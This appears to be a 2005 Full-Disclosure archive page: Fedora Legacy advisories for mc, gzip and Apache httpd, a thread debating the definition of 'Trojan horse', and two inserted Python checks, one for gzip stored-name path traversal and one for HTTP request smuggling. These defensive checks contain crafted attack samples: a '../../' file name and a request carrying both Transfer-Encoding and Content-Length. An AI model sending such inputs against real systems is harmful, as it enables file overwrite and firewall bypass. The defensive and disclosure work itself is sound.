CVE Names: CAN-2004-0226 CAN-2004-0231 CAN-2004-0232
   CAN-2004-0494 CAN-2004-1004 CAN-2004-1005
   CAN-2004-1009 CAN-2004-1090 CAN-2004-1091
   CAN-2004-1092 CAN-2004-1093 CAN-2004-1174
   CAN-2004-1175 CAN-2004-1176 CAN-2005-0763
-


-
1. Topic:

Updated mc packages that fix several security issues are now available.

Midnight Commander is a visual shell much like a file manager.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Several buffer overflows, several temporary file creation
vulnerabilities, and one format string vulnerability have been
discovered in Midnight Commander. These vulnerabilities were discovered
mostly by Andrew V. Samoilov and Pavel Roskin. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
names CAN-2004-0226, CAN-2004-0231, and CAN-2004-0232 to these issues.

Shell escape bugs have been discovered in several of the mc vfs backend
scripts. An attacker who is able to influence a victim to open a
specially-crafted URI using mc could execute arbitrary commands as the
victim. The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CAN-2004-0494 to this issue.

Several format string bugs were found in Midnight Commander. If a user
is tricked by an attacker into opening a specially crafted path with mc,
it may be possible to execute arbitrary code as the user running
Midnight Commander. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2004-1004 to this issue.

Several buffer overflow bugs were found in Midnight Commander. If a user
is tricked by an attacker into opening a specially crafted file or path
with mc, it may be possible to execute arbitrary code as the user
running Midnight Commander. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2004-1005 to this
issue.

Several denial of service bugs were found in Midnight Commander. These
bugs could cause Midnight Commander to hang or crash if a victim opens a
carefully crafted file. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the names CAN-2004-1009, CAN-2004-1090,
CAN-2004-1091, CAN-2004-1092, CAN-2004-1093 and CAN-2004-1174 to these
issues.

A filename quoting bug was found in Midnight Commander's FISH protocol
handler. If a victim connects via embedded SSH support to a host
containing a carefully crafted filename, arbitrary code may be executed
as the user running Midnight Commander. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2004-1175 to
this issue.

A buffer underflow bug was found in Midnight Commander. If a malicious
local user is able to modify the extfs.ini file, it could be possible to
execute arbitrary code as a user running Midnight Commander. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
name CAN-2004-1176 to this issue.

A buffer overflow bug was found in the way Midnight Commander handles
directory completion. If a victim uses completion on a maliciously
crafted directory path, it is possible for arbitrary code to be executed
as the user running Midnight Commander. The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2005-0763 to
this issue.

Users of mc are advised to upgrade to these packages, which contain
backported security patches to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs f

[Full-disclosure] [FLSA-2005:157696] Updated gzip package fixes security issues

2005-08-10 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated gzip package fixes security issues
Advisory ID:   FLSA:157696
Issue date:2005-08-10
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CAN-2005-0758 CAN-2005-0988 CAN-2005-1228
-


-
1. Topic:

An updated gzip package is now available.

The gzip package contains the GNU gzip data compression program.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

A bug was found in the way zgrep processes file names. If a user can be
tricked into running zgrep on a file with a carefully crafted file name,
arbitrary commands could be executed as the user running zgrep. The
Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-0758 to this issue.

A bug was found in the way gunzip modifies permissions of files being
decompressed. A local attacker with write permissions in the directory
in which a victim is decompressing a file could remove the file being
written and replace it with a hard link to a different file owned by the
victim; gunzip then gives the linked file the permissions of the
uncompressed file. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2005-0988 to this issue.

A directory traversal bug was found in the way gunzip processes the -N
flag. If a victim decompresses a file with the -N flag, gunzip fails to
sanitize the path which could result in a file owned by the victim being
overwritten. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2005-1228 to this issue.

Users of gzip should upgrade to this updated package, which contains
backported patches to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=157696

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/gzip-1.3.3-1.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/gzip-1.3.3-1.2.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/gzip-1.3.3-9.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/gzip-1.3.3-9.2.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/gzip-1.3.3-11.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/gzip-1.3.3-11.2.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/gzip-1.3.3-12.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/gzip-1.3.3-12.2.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http
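
The -N issue above (CAN-2005-1228) turns on the filename that gzip restores from a member's FNAME header field. As an added example, not code from the gzip project or from the advisory, this Python builds a gzip member with an arbitrary stored name, reads the field back, and reduces it to a bare basename before it could be used as an output path; build_gzip, read_stored_name and safe_output_name are names chosen here, and the sample names and payload are constructed.

```python
import gzip
import struct
import zlib
from typing import Optional, Tuple

# RFC 1952 FLG bits
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16


def build_gzip(data: bytes, stored_name: bytes, mtime: int = 0) -> bytes:
    """Assemble one gzip member whose FNAME field is exactly stored_name.

    Helper for the constructed samples: gzip.GzipFile() would reduce the
    name to its basename before writing it, so the header is built by hand.
    """
    # ID1 ID2 CM FLG MTIME(4) XFL OS -> the 10-byte fixed header
    header = struct.pack("<3sBIBB", b"\x1f\x8b\x08", FNAME, mtime, 0, 255)
    header += stored_name + b"\x00"          # zero-terminated original name
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)  # raw deflate
    body = comp.compress(data) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(data) & 0xFFFFFFFF,
                          len(data) & 0xFFFFFFFF)
    return header + body + trailer


def read_stored_name(blob: bytes) -> Optional[str]:
    """Return the FNAME field of a gzip member, or None if the flag is unset."""
    if len(blob) < 10 or blob[:2] != b"\x1f\x8b" or blob[2] != 8:
        raise ValueError("not a gzip member")
    flg = blob[3]
    pos = 10
    if flg & FEXTRA:                          # skip the optional extra field
        (xlen,) = struct.unpack_from("<H", blob, pos)
        pos += 2 + xlen
    if not flg & FNAME:
        return None
    end = blob.index(b"\x00", pos)
    return blob[pos:end].decode("latin-1")


def safe_output_name(stored: Optional[str], archive_name: str) -> str:
    """Choose the file to write when restoring the stored name (-N style).

    Only the last path component of the stored name is kept; a directory
    part, an absolute prefix, '.', '..' or an empty result is discarded and
    the name derived from the archive's own name is used instead. This is a
    defender's check written for this example, not the gzip project's patch.
    """
    if archive_name.endswith(".gz"):
        fallback = archive_name[:-3]
    else:
        fallback = archive_name + ".out"
    if not stored:
        return fallback
    base = stored.rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        return fallback
    return base


def decompress_member(blob: bytes) -> bytes:
    """Sanity check that a constructed member is still a valid gzip stream."""
    return gzip.decompress(blob)


def demo() -> Tuple[str, str]:
    """Constructed samples: one honest name, one carrying a directory part."""
    payload = b"constructed sample payload\n"
    honest = build_gzip(payload, b"notes.txt")
    crafted = build_gzip(payload, b"../../victim-owned-file.txt")
    assert decompress_member(crafted) == payload   # the member itself is fine
    return (safe_output_name(read_stored_name(honest), "notes.txt.gz"),
            safe_output_name(read_stored_name(crafted), "download.gz"))


if __name__ == "__main__":
    print(demo())   # ('notes.txt', 'victim-owned-file.txt')
```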

[Full-disclosure] [FLSA-2005:157701] Updated Apache httpd packages fix security issues

2005-08-10 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated Apache httpd packages fix security issues
Advisory ID:   FLSA:157701
Issue date:2005-08-10
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CAN-2005-1268 CAN-2005-1344 CAN-2005-2088
-


-
1. Topic:

Updated Apache httpd packages to correct security issues are now
available.

The Apache HTTP Server is a powerful, full-featured, efficient, and
freely-available Web server.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Watchfire reported a flaw that occurred when using the Apache server as
an HTTP proxy. A remote attacker could send an HTTP request with both a
"Transfer-Encoding: chunked" header and a "Content-Length" header. This
caused Apache to incorrectly handle and forward the body of the request
in a way that the receiving server processes it as a separate HTTP
request. This could allow the bypass of Web application firewall
protection or lead to cross-site scripting (XSS) attacks. The Common
Vulnerabilities and Exposures project (cve.mitre.org) assigned the name
CAN-2005-2088 to this issue.

A buffer overflow was discovered in htdigest that may allow an attacker
to execute arbitrary code. Since htdigest is usually only accessible
locally, the impact of this issue is low. The Common Vulnerabilities and
Exposures project (cve.mitre.org) assigned the name CAN-2005-1344 to
this issue.

Marc Stern reported an off-by-one overflow in the mod_ssl CRL
verification callback. In order to exploit this issue the Apache server
would need to be configured to use a malicious certificate revocation
list (CRL). The Common Vulnerabilities and Exposures project
(cve.mitre.org) assigned the name CAN-2005-1268 to this issue.

Users of Apache httpd should update to these errata packages that
contain backported patches to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=157701

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/apache-1.3.27-8.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/apache-1.3.27-8.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/apache-devel-1.3.27-8.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/apache-manual-1.3.27-8.legacy.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/httpd-2.0.40-21.18.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/httpd-2.0.40-21.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/httpd-devel-2.0.40-21.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/httpd-manual-2.0.40-21.18.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/mod_ssl-2.0.40-21.18.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/httpd-2.0.51-1.7.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/httpd-2.0.51-1.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/httpd-devel-2.0.51-1.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/httpd-manual-2.0.51-1.7.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/mod_ssl-2.0.51-1.7.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/httpd-2.0.51-2.9.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/httpd-2.0.51-2.9.2.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/2/updates/i386/httpd-devel-2.0.51-2.9.2.legacy.i3
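
The request-smuggling issue above (CAN-2005-2088) turns on a request that carries both a Transfer-Encoding and a Content-Length header. As an added example, not code from the Apache project or from the advisory, this Python checks a raw request head for exactly that ambiguity, the way a proxy or WAF front end would before forwarding it; parse_head, framing_problems and check_request are names chosen here, and the two sample requests are constructed.

```python
import re
from typing import List, Tuple

# token characters from RFC 7230 section 3.2.6
_HEADER_RE = re.compile(r"^([!#$%&'*+\-.^_`|~0-9A-Za-z]+):[ \t]*(.*?)[ \t]*$")


def parse_head(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split an HTTP/1.x request head into its request line and header fields.

    Field names are lower-cased so duplicates can be counted; obsolete line
    folding is refused outright because it is one more way to hide a field
    from a downstream parser.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t"):
            raise ValueError("obsolete line folding is not accepted")
        m = _HEADER_RE.match(line)
        if m is None:
            raise ValueError("malformed header line: %r" % line)
        headers.append((m.group(1).lower(), m.group(2)))
    return lines[0], headers


def framing_problems(headers: List[Tuple[str, str]]) -> List[str]:
    """Reasons the message body length is ambiguous; an empty list means OK.

    Applies the rule later written down in RFC 7230 section 3.3.3: a message
    with both Transfer-Encoding and Content-Length must not be forwarded
    as-is, and disagreeing or malformed Content-Length values are errors.
    """
    te = [v for n, v in headers if n == "transfer-encoding"]
    cl = [v for n, v in headers if n == "content-length"]
    problems: List[str] = []
    if te and cl:
        problems.append("both Transfer-Encoding and Content-Length present")
    if len(set(cl)) > 1:
        problems.append("conflicting Content-Length values")
    for v in cl:
        if not v.isdigit():
            problems.append("non-numeric Content-Length %r" % v)
    if te:
        codings = [c.strip().lower() for c in ",".join(te).split(",") if c.strip()]
        if not codings or codings[-1] != "chunked":
            problems.append("Transfer-Encoding does not end with chunked")
        elif codings.count("chunked") > 1:
            problems.append("chunked applied more than once")
    return problems


def check_request(raw: bytes) -> List[str]:
    """Parse a raw request head and report its framing problems."""
    _, headers = parse_head(raw)
    return framing_problems(headers)


# Constructed samples (not captured traffic).
CLEAN_REQUEST = (
    b"POST /submit HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"hello"
)

AMBIGUOUS_REQUEST = (
    b"POST /submit HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)


if __name__ == "__main__":
    print(check_request(CLEAN_REQUEST))       # []
    print(check_request(AMBIGUOUS_REQUEST))   # ['both Transfer-Encoding and Content-Length present']
```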

RE: [Full-disclosure] Re: Help put a stop to incompetent computerforensics

2005-08-10 Thread hummer



Can we agree that in the world of computer security the Trojan horse is a
malicious program disguised as legitimate software and let it go at that?

Thanks

Hummer Marchand, GCIH, CISSP, CompTIA Security+


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Donald J. Ankney
Sent: Wednesday, August 10, 2005 5:20 PM
To: [EMAIL PROTECTED]
Cc: Full-Disclosure; Thierry Zoller
Subject: Re: [Full-disclosure] Re: Help put a stop to incompetent computerforensics

Wikipedia:

In the context of computer software, a Trojan horse is a malicious program
that is disguised as legitimate software. The term is derived from the
classical myth of the Trojan horse. In the siege of Troy, the Greeks left a
large wooden horse outside the city. The Trojans were convinced that it was
a gift, and moved the horse to a place within the city walls. It turned out
that the horse was hollow, containing Greek soldiers who opened the city
gates of Troy at night, making it possible for the Greek army to pillage
the city. Trojan horse programs work in a similar way: they may look useful
or interesting (or at the very least harmless) to an unsuspecting user, but
are actually harmful when executed.

http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29

Your definition is just a subset of the standard, broader one.

On Aug 10, 2005, at 3:43 PM, Jason Coombs wrote:

[EMAIL PROTECTED] wrote:

On Thu, Aug 11, 2005 at 12:26:23AM +0200, Thierry Zoller wrote:

The industry definition is perfectly within Homer's definition of a Trojan
horse.

JC> http://classics.mit.edu/Homer/iliad.html

When I read Homer, it was a Greek horse.

The horse became the property of the Trojans before it launched its hidden
attack, but your point is interesting as well.

There are other terms used to describe malware disguised as something else
that has hidden capability to cause damage. Logic bomb, for example.

I'll do some more work on this and see where it leads. The proposal of
"backdoor" as the better term just doesn't work, since a backdoor is a
hidden mechanism for gaining entry or control of a system that is built
into the system by its creator or some other involved party. An intruder
may open up a backdoor in a system by altering its programming rather than
by planting a Trojan, so there needs to be a distinction between the two.

Cheers,

Jason Coombs
[EMAIL PROTECTED]

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Technica Forensis
> From:
> 
> http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29
> 
> In practice, Trojan Horses in the wild do contain spying functions (such
> as a Packet sniffer) or backdoor functions that allow a computer,
> unbeknownst to the owner, to be remotely controlled from the
> network, creating a "zombie_computer". Because Trojan horses often have
> these harmful functions, there often arises the misunderstanding that
> such functions define a Trojan Horse.

Jason, you just posted a quote that contradicts your stance.  You are
now officially fighting yourself.
This quote says exactly what Thierry has been telling you: 
"In practice, Trojan Horses in the wild do contain [[the stuff Jason
said they do]].  Because Trojan horses often [[do the things Jason
said they do]], there often arises the misunderstanding that [[Jason's
definition]] define[s] a Trojan Horse."

This last sentence is saying that people often think that since a
trojan is often a backdoor that all trojans are backdoors, when in
fact the definition of a trojan is much broader.


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Donald J. Ankney
Wikipedia:

In the context of computer software, a Trojan horse is a malicious program
that is disguised as legitimate software. The term is derived from the
classical myth of the Trojan horse. In the siege of Troy, the Greeks left a
large wooden horse outside the city. The Trojans were convinced that it was
a gift, and moved the horse to a place within the city walls. It turned out
that the horse was hollow, containing Greek soldiers who opened the city
gates of Troy at night, making it possible for the Greek army to pillage
the city. Trojan horse programs work in a similar way: they may look useful
or interesting (or at the very least harmless) to an unsuspecting user, but
are actually harmful when executed.

http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29

Your definition is just a subset of the standard, broader one.

On Aug 10, 2005, at 3:43 PM, Jason Coombs wrote:

[EMAIL PROTECTED] wrote:

On Thu, Aug 11, 2005 at 12:26:23AM +0200, Thierry Zoller wrote:

The industry definition is perfectly within Homer's definition of a Trojan
horse.

JC> http://classics.mit.edu/Homer/iliad.html

When I read Homer, it was a Greek horse.

The horse became the property of the Trojans before it launched its hidden
attack, but your point is interesting as well.

There are other terms used to describe malware disguised as something else
that has hidden capability to cause damage. Logic bomb, for example.

I'll do some more work on this and see where it leads. The proposal of
"backdoor" as the better term just doesn't work, since a backdoor is a
hidden mechanism for gaining entry or control of a system that is built
into the system by its creator or some other involved party. An intruder
may open up a backdoor in a system by altering its programming rather than
by planting a Trojan, so there needs to be a distinction between the two.

Cheers,

Jason Coombs
[EMAIL PROTECTED]

Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Thierry Zoller
Dear Jason Coombs,

JC> Because Trojan horses often have
JC> these harmful functions, there often arises the misunderstanding that
^   
JC> such functions define a Trojan Horse.

Please read what you just posted, it directly contradicts what
that wikipedia author wrote 2 lines above that. That wikipedia
article can be trashed.

Sorry, this thread is closed for me; if you'd like to mix up
definitions, please go ahead.

-- 
Thierry Zoller
mailto:[EMAIL PROTECTED]




Re: [Full-disclosure] Help put a stop to incompetent computer forensics

2005-08-10 Thread Technica Forensis
> After a trivial Google search, the following was found:

After all, any experienced computer forensics person should know how
to use Google.


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Technica Forensis
> Interesting. What dictionary are you reading this definition from?

Industry standard
 
> Whether or not the malware does other things as well, everyone I know
> considers a Trojan to be a type of malware that allows an intruder to
> gain entry to a system through the front door once the malware has
> gained entry through some other means such as tricking the user into
> installing it, forcing itself to install a la spyware, or exploiting one
> of the many vulnerabilities in Internet Explorer that enable Web sites
> to plant and execute arbitrary code.
> 
> If your proposed definition is the correct one, I'm willing to alter my
> own understanding of this term. But you're going to have to offer some
> proof that other people agree with you.

I took a poll around my office, and we all agree you're wrong on two
counts:  1. your definition of Trojan Horse and 2. your desire to
personally attack people when their views differ from your own.

> 
> Somehow I suspect that Homer would disagree with you, and he is the
> proper definitive authority on this subject. See the story of the fall
> of Troy through the use of a Trojan Horse that enabled the whole Greek
> army to gain entry through the front gates because of the actions of the
> hidden package within the horse.

Did the horse the Greeks built create another gate that they could use
that wasn't properly secured by the Trojans?  Or, open the front door
remotely?  Your definition is the one that doesn't hold up to Homer's.


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Jason Coombs

Erik Kamerling wrote:

Trojan Horse
A computer program that appears to have a useful function, but also has a 
hidden and potentially malicious function that evades security mechanisms, 
sometimes by exploiting legitimate authorizations of a system entity that 
invokes the program.


Copied from the SANS Glossary of Terms Used in Security and Intrusion 
Detection. 


http://www.sans.org/resources/glossary.php


Common usage in practice today matters as much as if not more than the 
original use of the term in computing. The term Trojan is synonymous 
with malware that adds a backdoor, even if a bunch of old people think 
it's still okay to call other malicious code by this name.


From:

http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29

In practice, Trojan Horses in the wild do contain spying functions (such 
as a Packet sniffer) or backdoor functions that allow a computer, 
unbeknownst to the owner, to be remotely controlled from the 
network, creating a "zombie_computer". Because Trojan horses often have 
these harmful functions, there often arises the misunderstanding that 
such functions define a Trojan Horse.



Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Erik Kamerling
Trojan Horse
A computer program that appears to have a useful function, but also has a 
hidden and potentially malicious function that evades security mechanisms, 
sometimes by exploiting legitimate authorizations of a system entity that 
invokes the program.

Copied from the SANS Glossary of Terms Used in Security and Intrusion 
Detection. 

http://www.sans.org/resources/glossary.php

Best

Erik Kamerling

On Wednesday 10 August 2005 18:43, Jason Coombs wrote:

> I'll do some more work on this and see where it leads. The proposal of
> "backdoor" as the better term just doesn't work, since a backdoor is a
> hidden mechanism for gaining entry or control of a system that is built
> into the system by its creator or some other involved party. An intruder
> may open up a backdoor in a system by altering its programming rather
> than by planting a Trojan, so there needs to be a distinction between
> the two.


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Jason Coombs

[EMAIL PROTECTED] wrote:

On Thu, Aug 11, 2005 at 12:26:23AM +0200, Thierry Zoller wrote:

The industry definition is perfectly within Homer's definition of a Trojan
horse.

JC> http://classics.mit.edu/Homer/iliad.html

When I read Homer, it was a Greek horse.

The horse became the property of the Trojans before it launched its 
hidden attack, but your point is interesting as well.

There are other terms used to describe malware disguised as something 
else that has hidden capability to cause damage. Logic bomb, for example.


I'll do some more work on this and see where it leads. The proposal of 
"backdoor" as the better term just doesn't work, since a backdoor is a 
hidden mechanism for gaining entry or control of a system that is built 
into the system by its creator or some other involved party. An intruder 
may open up a backdoor in a system by altering its programming rather 
than by planting a Trojan, so there needs to be a distinction between 
the two.


Cheers,

Jason Coombs
[EMAIL PROTECTED]


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Blue Boar
Jason Coombs wrote:
> Whether or not the malware does other things as well, everyone I know
> considers a Trojan to be a type of malware that allows an intruder to
> gain entry to a system through the front door once the malware has
> gained entry through some other means such as tricking the user into
> installing it, forcing itself to install a la spyware, or exploiting one
> of the many vulnerabilities in Internet Explorer that enable Web sites
> to plant and execute arbitrary code.

Traditional malicious code terms going back 20+ years ago hold that a
"trojan horse" program is one that performs a function other than or in
addition to the function it is advertised to have.  The reason for this
is to trick a user into running it, under the assumption that it does
something useful, or is at least harmless.  This name comes from the
"accepting the gift" aspect of Homer's story.  Back then, the world was
DOS, and there was no generally accepted connotation of installing a
backdoor; systems were not widely networked.

Current casual usage of "trojan" or "trojaned" is synonymous with a
program that provides an unauthorized user continued access to a victim
computer.  The "trojan" portion of the term has apparently morphed to
mean that the program usually attempts to make itself appear to be a
legitimate program, often by running as a process named the same as a
real system process, etc... or general hiding.  For this usage you could
substitute the term "backdoor".

But you guys are just arguing semantics, and the meaning(s) ought to be
clear to all of you from the context.  And now you've made me do it, too.

BB


Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Thierry Zoller
Dear Jason Coombs,

JC> Interesting. What dictionary are you reading this definition from?
10 years security industry, AV experience, Whatis, and so on.

JC> Whether or not the malware does other things as well, everyone I know
JC> considers a Trojan to be a type of malware that allows an intruder to
JC> gain entry to a system through the front door once the malware has
JC> gained entry through some other means such as tricking the user into
JC> installing it, forcing itself to install a la spyware, or exploiting one
JC> of the many vulnerabilities in Internet Explorer that enable Web sites
JC> to plant and execute arbitrary code.

That's the brainwashed mashup media definition; we should pay
attention that they don't succeed too much. Hacker, cracker, whitehat,
blackhat, "they are all alike".

JC> If your proposed definition is the correct one
I don't propose, it's an industry standard, ask kaspersky
and other AV vendors, look at how they categorise these items.

JC> own understanding of this term. But you're going to have to offer some
JC> proof that other people agree with you.
No proof from me here except pure logic.

JC> Somehow I suspect that Homer would disagree with you, and he is the
JC> proper definitive authority on this subject.
Actually it is that exact definition.

JC> See the story of the fall
JC> of Troy through the use of a Trojan Horse that enabled the whole Greek
JC> army to gain entry through the front gates because of the actions of the
JC> hidden package within the horse.

The industry definition is perfectly within Homer's definition of a Trojan
horse. Did the trojan horse allow them to remotely control them? No,
the trojan horse was something else than it pretended. It pretended to be
a present in the form of an art piece. What it really was was a hollow
sculpture filled with armed soldiers.

JC> http://classics.mit.edu/Homer/iliad.html



-- 
Kind regards
Thierry Zoller
mailto:[EMAIL PROTECTED]




Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Fergie (Paul Ferguson)
Hello? I can't believe I'm getting suckered into this...

Wikipedia:
Trojan horse (computing): In the context of computer
software, a Trojan horse is a malicious program that
is disguised as legitimate software. The term is derived
from the classical myth of the Trojan horse.
http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29

Dictionary.com:
Trojan horse
n.
1. A subversive group or device placed within enemy ranks.
2. The hollow wooden horse in which, according to legend,
Greeks hid and gained entrance to Troy, later opening the
gates to their army.
3. Computer Science. A program that appears to be legitimate
but is designed to have destructive effects, as to data
residing in the computer onto which the program was loaded.

- ferg


-- Jason Coombs <[EMAIL PROTECTED]> wrote:

Thierry Zoller wrote:
> Or in better English :
> A computer trojan horse is a program which appears to be something good,
> but actually conceals something bad.

Interesting. What dictionary are you reading this definition from?

[snip]

Jason Coombs
[EMAIL PROTECTED]


--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 [EMAIL PROTECTED] or [EMAIL PROTECTED]
 ferg's tech blog: http://fergdawg.blogspot.com/



Re: [Full-disclosure] Re: Help put a stop to incompetent computer forensics

2005-08-10 Thread Jason Coombs

Thierry Zoller wrote:

> Or in better English :
> A computer trojan horse is a program which appears to be something good,
> but actually conceals something bad.


Interesting. What dictionary are you reading this definition from?

Whether or not the malware does other things as well, everyone I know 
considers a Trojan to be a type of malware that allows an intruder to 
gain entry to a system through the front door once the malware has 
gained entry through some other means such as tricking the user into 
installing it, forcing itself to install a la spyware, or exploiting one 
of the many vulnerabilities in Internet Explorer that enable Web sites 
to plant and execute arbitrary code.


If your proposed definition is the correct one, I'm willing to alter my 
own understanding of this term. But you're going to have to offer some 
proof that other people agree with you.


Somehow I suspect that Homer would disagree with you, and he is the 
proper definitive authority on this subject. See the story of the fall 
of Troy through the use of a Trojan Horse that enabled the whole Greek 
army to gain entry through the front gates because of the actions of the 
hidden package within the horse.


http://classics.mit.edu/Homer/iliad.html

Regards,

Jason Coombs
